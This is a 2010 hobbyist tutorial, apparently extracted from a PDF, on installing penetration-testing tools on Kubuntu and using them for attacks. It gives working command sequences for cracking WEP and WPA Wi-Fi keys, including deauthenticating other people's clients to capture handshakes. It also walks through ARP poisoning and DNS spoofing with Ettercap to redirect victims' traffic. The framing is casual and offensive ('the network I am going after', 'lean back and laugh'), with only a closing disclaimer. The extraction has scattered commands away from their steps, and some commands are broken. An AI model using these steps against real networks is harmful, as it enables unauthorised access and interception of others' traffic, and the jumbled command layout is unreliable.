Basic Penetration Testing: Kubuntu Style Linux for the casual hacker Installing: Aircrack-ng

Ettercap

Kismet

MacChanger

Metasploit Framework

Nmap

Social Engineering Toolkit (SET)

Wireshark

Basic Use: Kismet network sniffing

Aircrack-ng WEP and WPA cracking

Ettercap ARP poisoning / DNS Spoofing

2010

Chris Griffith Chris@ChristopherGriffith.net

Version 1.1 February 25, 2010

PENETRATION TESTING Step 1: Install Kubuntu .................................................................................................................................. 4

Step 2: Update apt-get .................................................................................................................................. 4

Update repository list ............................................................................................................................... 4

Upgrade current programs ....................................................................................................................... 4

Step 3: Install Basic Packages ........................................................................................................................ 4

Install Aircrack-ng.......................................................................................................................................... 5

Install Dependencies ................................................................................................................................. 5

Download Aircrack-ng ............................................................................................................................... 5

Download and Extract Dictionary ............................................................................................................. 5

Extract Aircrack-ng source files ................................................................................................................. 5

Install Aircrack-ng...................................................................................................................................... 5

Update Airodump-ng ................................................................................................................................ 5

Remove Install File .................................................................................................................................... 5

Install MacChanger ....................................................................................................................................... 6

Install Dependencies ................................................................................................................................. 6

Install MacChanger ................................................................................................................................... 6

Install Wireshark ........................................................................................................................................... 6

Install Kismet ................................................................................................................................................. 7

Install Dependencies ................................................................................................................................. 7

Download Kismet ...................................................................................................................................... 7

Extract Kismet source files ........................................................................................................................ 7

Run Configuration ..................................................................................................................................... 7

Install Kismet ............................................................................................................................................. 7

Remove Install File .................................................................................................................................... 8

Configure Kismet ....................................................................................................................................... 8

Install Metasploit .......................................................................................................................................... 9

Download Metasploit ............................................................................................................................... 9

Enable Execution ....................................................................................................................................... 9

Install Metasploit ...................................................................................................................................... 9

Remove Install File .................................................................................................................................... 9

Install SET .................................................................................................................................................... 10

Install Dependencies ............................................................................................................................... 10

Download SET ......................................................................................................................................... 10

Run SET ................................................................................................................................................... 10

Install Nmap ................................................................................................................................................ 11

Download Nmap ..................................................................................................................................... 11

Extract Nmap Files .................................................................................................................................. 11

Configure Nmap ...................................................................................................................................... 11

Install Nmap ............................................................................................................................................ 11

Install Nmap GUI, Zenmap ...................................................................................................................... 11

Remove Install Files ................................................................................................................................ 12

Install Ettercap ............................................................................................................................................ 12

Install Dependencies ............................................................................................................................... 12

Install Ettercap ........................................................................................................................................ 12

Install Ettercap's gtk GUI ......................................................................................................................... 12

Running Kismet ........................................................................................................................................... 13

Running Aircrack-ng .................................................................................................................................... 18

Scanning Networks ................................................................................................................................. 18

WEP Attack .............................................................................................................................................. 19

WPA Attack ............................................................................................................................................. 21

DNS spoofing with Ettercap ........................................................................................................................ 25

Editing Where to Redirect Targets .......................................................................................................... 25

Sniffing Network Traffic .......................................................................................................................... 25

Poisoning Targets .................................................................................................................................... 27

Contact Info................................................................................................................................................. 29

Legal Notice and Disclaimer ........................................................................................................................ 29

Liability .................................................................................................................................................... 29

Legality .................................................................................................................................................... 29

STEP 1: INSTALL KUBUNTU

(Most of these commands are also friendly with other flavors of Ubuntu)

• Go to http://www.kubuntu.org/ • Download (free) or Order a CD/DVD of Kubuntu • Install Kubuntu – if you need help there are plenty of community support sites online similar to

linux.com that will help you get started

STEP 2: UPDATE APT-GET

Note: requires internet connection

apt-get is the program that you will be using to download multiple components. The first step is to update its repository list and also see if there are any program updates needed. To run these commands start the terminal. It can be found under Applications >> System >> Terminal.

UPDATE REPOSITORY LIST

UPGRADE CURRENT PROGRAMS

STEP 3: INSTALL BASIC PACKAGES

These will make your life easier while installing packages and using kubuntu.

Note: While installing, it is assumed that you are starting in your home directory. You can make sure you are in that directory before doing any installations by typing in:

NOTICE: Each block of code represents a single command, even if on multiple rows!

sudo apt-get -y update

sudo apt-get -y upgrade

sudo apt-get -y install build-essential subversion libglut3-dev python-dev iw

libssl-dev

sudo cd ~

INSTALL AIRCRACK-NG

Website: http://aircrack-ng.org/

Description: "Aircrack-ng is an 802.11 WEP and WPA-PSK keys cracking program that can recover keys once enough data packets have been captured. It implements the standard FMS attack along with some optimizations like KoreK attacks, as well as the all-new PTW attack, thus making the attack much faster compared to other WEP cracking tools."

INSTALL DEPENDENCIES

DOWNLOAD AIRCRACK-NG

DOWNLOAD AND EXTRACT DICTIONARY

EXTRACT AIRCRACK-NG SOURCE FILES

INSTALL AIRCRACK-NG

UPDATE AIRODUMP-NG

REMOVE INSTALL FILE

sudo apt-get -y install build-essential libssl-dev libsqlite3-0 iw rar unrar

wget http://download.aircrack-ng.org/aircrack-ng-1.0.tar.gz

wget http://www.christophergriffith.net/downloads/Glist.rar

unrar e Glist.rar

tar -zxvf aircrack-ng-1.0.tar.gz

cd aircrack-ng-1.0

make

sudo make install

sudo airodump-ng-oui-update

cd ~

INSTALL MACCHANGER Website: http://www.alobbs.com/macchanger

Description: “A GNU/Linux utility for viewing/manipulating the MAC address of network interfaces”

INSTALL DEPENDENCIES

INSTALL MACCHANGER

INSTALL WIRESHARK Website: http://www.wireshark.org

Description: "Wireshark is the world's foremost network protocol analyzer, and is the de facto (and often de jure) standard across many industries and educational institutions."

sudo rm aircrack-ng-1.0.tar.gz

sudo rm –r aircrack-ng-1.0

sudo apt-get -y install macchanger iproute-dev zenity

sudo apt-get -y install macchanger-gtk

sudo apt-get -y install wireshark

INSTALL KISMET Website: http://www.kismetwireless.net/

Description: "Kismet is an 802.11 layer2 wireless network detector, sniffer, and intrusion detection system. Kismet will work with any wireless card which supports raw monitoring (rfmon) mode, and (with appropriate hardware) can sniff 802.11b, 802.11a, 802.11g, and 802.11n traffic. Kismet also supports plugins which allow sniffing other media such as DECT.

Kismet identifies networks by passively collecting packets and detecting standard named networks, detecting (and given time, de-cloaking) hidden networks, and inferring the presence of nonbeaconing networks via data traffic. "

INSTALL DEPENDENCIES

DOWNLOAD KISMET

EXTRACT KISMET SOURCE FILES

RUN CONFIGURATION

Note: (LOOK AT THE OUTPUT! It may say "LibNL/nl80211 support was not found." check to make sure it's installed. The terminal may just say this because it's just not needed/used. If there are errors here try to fix them and then you will need to run this command again before "make dep")

INSTALL KISMET

sudo apt-get -y install libruby libcurses-ruby libncurses5-dev libncurses5

sudo apt-get -y install libpcap-dev libnl-dev libnl1

wget http://www.kismetwireless.net/code/kismet-2010-01-R1.tar.gz

tar -zxvf kismet-2010-01-R1.tar.gz

cd kismet-2010-01-R1

./configure

make dep

sudo make install

Note: It will give the option to use "sudo make suidinstall" which means you do not have to run kismet as root, however in kubuntu that is very temperamental and requires the kismet_server to be started as root separately anyways. I would recommend just using "sudo make install" and running it as root.

REMOVE INSTALL FILE

CONFIGURE KISMET

You will also have to edit the configuration file before using kismet. This will be covered in the section below about kismet usage. You can edit the file by typing

cd ~

sudo rm kismet-2010-01-R1.tar.gz

sudo rm –r kismet-2010-01-R1

sudo kate /usr/local/etc/kismet.conf

INSTALL METASPLOIT Metasploit is arguably the best open database of exploits.

Website: http://www.metasploit.com/

Description: "Metasploit provides useful information and tools for penetration testers, security researchers, and IDS signature developers. This project was created to provide information on exploit techniques and to create a functional knowledgebase for exploit developers and security professionals."

DOWNLOAD METASPLOIT

ENABLE EXECUTION

INSTALL METASPLOIT

REMOVE INSTALL FILE

In case you hate cluttering up your home folder like I do, remove the install files with:

wget http://www.metasploit.com/releases/framework-3.3.3-linux-i686.run

chmod +x framework-3.3.3-linux-i686.run

sudo ./framework-3.3.3-linux-i686.run

sudo rm framework-3.3.3-linux-i686.run

INSTALL SET The Social Engineering Toolkit, a very nice and easy way to run a multitude of different exploits, by exploiting the user with payloads from Metasploit.

Website: http://www.offensive-security.com/metasploit-unleashed/Social-Engineering-Toolkit

Description: "The Social-Engineering Toolkit (SET) was designed by David Kennedy (ReL1K) and incorporates many useful Social-Engineering attacks all in one simplistic interface. The main purpose of SET is to automate and improve on many of the social-engineering attacks out there. As pentesters, social-engineering is often a practice that not many people perform."

INSTALL DEPENDENCIES

NOTE: SET requires Metasploit, please install it before trying to run SET

DOWNLOAD SET

RUN SET

SET does NOT require installation. To run SET, go it it's directory and type in " sudo ./set " In this scenario, the code would look like:

sudo apt-get -y install subversion libglut3-dev python-dev iw ruby-full

svn co http://svn.thepentest.com/social_engineering_toolkit/ SET/

cd SET

sudo ./set

INSTALL NMAP Website: http://nmap.org/

Description”: Nmap (‘Network Mapper’) is a free and open source utility for network exploration or security auditing. Many systems and network administrators also find it useful for tasks such as network inventory, managing service upgrade schedules, and monitoring host or service uptime. Nmap uses raw IP packets in novel ways to determine what hosts are available on the network, what services (application name and version) those hosts are offering, what operating systems (and OS versions) they are running, what type of packet filters/firewalls are in use, and dozens of other characteristics. It was designed to rapidly scan large networks, but works fine against single hosts.”

Note: If you simply want to install Nmap and Zenmap and not worry if they are the latest version just type:

If you DO want the newest version, follow these steps:

DOWNLOAD NMAP

EXTRACT NMAP FILES

CONFIGURE NMAP

INSTALL NMAP

INSTALL NMAP GUI, ZENMAP

sudo apt-get -y install nmap

sudo apt-get -y install zenmap

wget http://nmap.org/dist/nmap-5.21.tar.bz2

bzip2 -cd nmap-5.21.tar.bz2 | tar xvf -

cd nmap-5.21

./configure

make

sudo make install

sudo apt-get -y install zenmap

REMOVE INSTALL FILES

INSTALL ETTERCAP Website: http://ettercap.sourceforge.net/

Description: “Ettercap is a suite for man in the middle attacks on LAN. It features sniffing of live connections, content filtering on the fly and many other interesting tricks. It supports active and passive dissection of many protocols (even ciphered ones) and includes many feature for network and host analysis.”

Note: Ettercap is fairly well supported by the Ubuntu team and you can usually find an up to date version in the repositories. This just outlines which dependencies to get along with the GUI.

INSTALL DEPENDENCIES

INSTALL ETTERCAP

INSTALL ETTERCAP'S GTK GUI

cd ~

sudo rm nmap-5.21.tar.bz2

sudo rmdir nmap-5.21

sudo apt-get -y install libnet6-1.3-dev libpcap-dev libpthread-stubs0-dev zlib-bin

zlibc libtool libpcre3-dev libpcre-ocaml-dev openssl libssl0.9.8 libncurses5-dev

libncurses5 ettercap-common libnet1

sudo apt-get -y install ettercap

sudo apt-get -f -y install ettercap-gtk

RUNNING KISMET Kismet is a user friendly program overall but needs some configuration before staring. Before starting kismet, you need to edit the configuration file.

Note: If you are running Ubuntu, type gedit instead of kate

Once having kismet.conf open, find the line

# logprefix=/some/path/to/logs

This is where you will have to change where all kismet's log files are stored. I personal use

/home/<myusername>/wifi/logs

(Change to your user name for your home folder.) To add these directories to your home folder, before editing the line, open a terminal and type:

The next thing you need to specify is which adapter of yours to use for wireless sniffing. Find the lines

# ncsource=interface:options

# for example:

# ncsource=wlan0

# ncsource=wifi0:type=madwifi

# ncsource=wlan0:name=intel,hop=false,channel=11

After all these add a line with your adapter. Most people would add

ncsource=wlan0

NOTE: If you are unsure what type of adapter you have, go to a terminal and type

This will display what network devices it finds. Then chose a wireless card, generally noted by wlan or wifi

sudo kate /usr/local/etc/kismet.conf

sudo mkdir ~/wifi

sudo mkdir ~/wifi/logs

ifconfig

The last thing you will want to change is where it says:

# Do we have a GPS?

gps=true

If you don't have a gps unit hooked up to your computer change it to

gps=false

You can now run kismet by opening a terminal and typing

One opening, if configured correctly it should ask you if you want to start kismet server. Select yes

sudo kismet

It will then give you options about the kismet server. You don't have to change anything here, click start

The terminal now will show what is running in the server, this isn't overly exciting, it will simply tell you if anything is going wrong. Close that window to get back to kismet by going to the bottom right hand corner.

You now should see the main page of Kismet. From here you can see all the wireless networks it has picked up, the general packet rate and how much data is being transferred. You can also select an individual network to find out more about it. However, before being able to select a network you have to sort them. I generally like to

sort by which network has the most packet traffic. You can do this by going to the top menu, Sort >> Packets (descending) or by hitting Alt+S then Shift + P

You can now select a network which will display general information about it. Click it or hit enter to see more details about it. To get back to the regular view, go to Network >> Close Window or Alt + N then hit W.

Another handy view is to go to Windows >> Channel View or Alt + W then C. It will show which channels has the most traffic, packet rate, and general signal strength.

That is the basic usage of Kismet, if you are interested in knowing more you can find a lot more usage and details all over forums and community sites.

RUNNING AIRCRACK-NG

Aircrack is the premier network cracking program. There are a few steps that will make it much easier to crack a network. I will outline the basics of scanning for a network to attack and how to attack it if it is either WEP or WPA.

SCANNING NETWORKS

First you want to put your wireless card in monitor mode. Do this by typing

For me this looks like:

sudo airmon-ng start <wireless interface>

sudo airmon-ng start wlan1

We then start scanning the different networks with the interface in monitoring mode.

The first type of attack we are going to run against a network running WEP encryption.

WEP ATTACK Once you find a suitable target, you need to start capturing IVs. Do this by specifying the network channel and that you only want to log IVs.

For my network, my command looks like:

sudo airodump-ng --channel 8 -w wifi/caps/WEP --ivs mon0

sudo airodump-ng mon0

sudo airodump-ng --channel <channel number> -w <cap file> --ivs mon0

Once you have collected a LOT of IVs (which you can see under the "#Data" column, a few thousand at least), start up aircrack on the file you have created. Notice that it now will be a .ivs file. It also is appended with numbers, so the first time you run that file, it would be WEP-01.ivs.

The command would look like:

My command is:

sudo aircrack-ng -a 1 <cap file>

sudo aircrack-ng -a 1 wifi/caps/WEP-01.ivs

Select the network you want to attack.

If you find the key, you can now use it to connect to the network. If not, it will probably ask you to capture more IVs and try again.

WPA ATTACK

WPA attacks require a device that supports packet injection; this will allow you to de-authenticate clients so they have to reconnect, which will allow you to capture their handshake. You will also need a dictionary of words to try and dictionary attack. You can download them online multiple places, I complied a small collection of very large dictionaries that you can download using:

When you see a network that you are interested in, you want to refine your network search and start logging the output.

The network I am going after is called Rogue Network which is on channel 1, so my command looks like

sudo airodump-ng --channel <channel number> -w <cap file> mon0

sudo airodump-ng --channel 1 -w wifi/caps/WPA mon0

While scanning the networks, you will notice underneath difference devices that are connect to the networks. This attack is much more powerful if you have someone in particular to de-authenticate.

Note: Make sure you are still running airodump-ng in another terminal. You will need to capture the WPA handshake as soon as the clients try to re-authenticate.

You can try to de-authenticate everyone and see if everyone reconnects:

Or you can specify a particular client to attack, by adding one after -c

sudo aireplay-ng --deauth <number of deauths to send> -a <target bssid> -c <clients

bssid> mon0

My example looks like:

sudo aireplay-ng --deauth <number of deauths to send> -a <target bssid> mon0

sudo aireplay-ng --deauth 5 -a 00:14:D1:C3:C9:88 -c 00:16:EA:72:58:BA mon0

Now switch over to the airodump-ng tab, and in the upper right hand corner, see if it says WPA Handshake

If you were able to capture one, you can move over to dictionary attacking it. If you were unable to capture a handshake, make sure you are attacking a WPA network with aireplay-ng and that there are clients connected to it.

The next step requires a dictionary file to try and crack it using a list of common words and passwords.

My command will look like this

sudo aircrack-ng -a 2 -w <dictionary file> <caps file>

It will start testing against your word list, and hopefully find the key.

sudo aircrack-ng -a 2 -w Glist.txt wifi/caps/WPA-01.cap

DNS SPOOFING WITH ETTERCAP

EDITING WHERE TO REDIRECT TARGETS

First step it to decide where to redirect the target, you can edit the file etter.dns.

At the end of the file, you can type the domain you want to redirect, and the IP of where you want to redirect to. to simply redirect someone, type the URL then A then the IP to redirect to.

For example, to redirect traffic from Google to Bing, type

google.com A 64.4.8.147

*.google.com A 64.4.8.147

The second one includes a wildcard so any subdomain of google will also be redirected or if they type www before it. You can find the IP address of the site you want to redirect to by going to the terminal and typing:

This will display a list of ips tied to that domain, the main one will be the first line displayed.

Save and close the file, now start up ettercap as root.

Note: if you are having problems with ettercap in GTK mode try running it directly in the terminal with curses. Do this by typing "sudo ettercap -C".

Now that you have your shinny front end, you want to first start sniffing the traffic of the network you are connected to. Remember, ettercap only works when you are connected to a network, while aircrack and kisment work better without being connected to a network.

SNIFFING NETWORK TRAFFIC

The next step you want to do is to start sniffing the traffic and all the hosts on your network. Start the "Unified sniffing.." under the "Sniff" menu item (Sniff >> Unified sniffing...), or ht Shift + U

sudo kate /usr/share/ettercap/etter.dns

host <website url>

sudo ettercap -G

.

This will bring up a drop down box of interfaces to sniff on. Select the one which you are connected to the network on. After selecting this and hitting ok, you will notice a larger selection of menu items.

Running in curses: you will need to type the name of the adapter in instead.

You now want to scan all the hosts on your network, to select your targets. Do this by going to Hosts >> Scan for hosts or Ctrl + S. Once the scan is complete, press H to see the hosts it picked up, or go to Hosts >> Hosts list.

Now you need to select who you want to poison. You are currently being the "man in the middle" and are choosing which connections to be between. To successfully spoof the DNS of the target computers, you must know the device that they are connected too. You can usually tell by it being a far off IP from the other's on the list. Most home routers will be 192.168.0.1 - 192.168.1.10 range. The one you see in the examples is 192.168.1.1. Select it and click on "Add to Target 1" the select all the other devices, or a specific one you want to poison, and add it to target 2.

.

Running in curses: you will have to manually add the targets. you can do this by hitting Ctrl + T or going to Targets >> Select TARGET(s). Then enter in the ips of the targets between the slashes. so either /192.168.1.1/ would work or /192.168.1.1-255/ if you want to do a range.

Note: You can check to make sure you specified the right targets by hitting T or going to Targets >> Current Targets.

POISONING TARGETS Now you need to poison the targets ARP. Go to Mitm >> Arp poisoning... A popup will appear, and you don't need to have any optional parameters, just accept and go on. Now hit Ctrl + W to start sniffing, or go to Start >> Start sniffing...

Finally enable the DNS Spoofing pluging by hitting Ctrl + P (Plugins >> Manage the plugins) and select "dns_spoof".

Now in the console underneath you should see the command "Activating dns_spoof plugin..."

Then lean back and laugh as you see your plugin working, it will display content when people try to go to a spoofed site: "dns_spoof: [<original url>] spoofed to [<new ip>]"

CONTACT INFO

I hope you have found this information useful and accurate.

If you find anything incorrect or confusing, or simply want to send a message, please feel free to contact me.

Chris@ChristopherGriffith.net

LEGAL NOTICE AND DISCLAIMER

LIABILITY 1. You are the only one liable if you use this information in an illegal or unethical manner. I hold no

responsibility for your actions with this knowledge. I hope you find it useful to test on your own network and learn how to tighten your own security.

LEGALITY 2. It is ILLEGAL to use many of these programs on networks you don’t own. Make sure you are abiding all

laws while using these programs.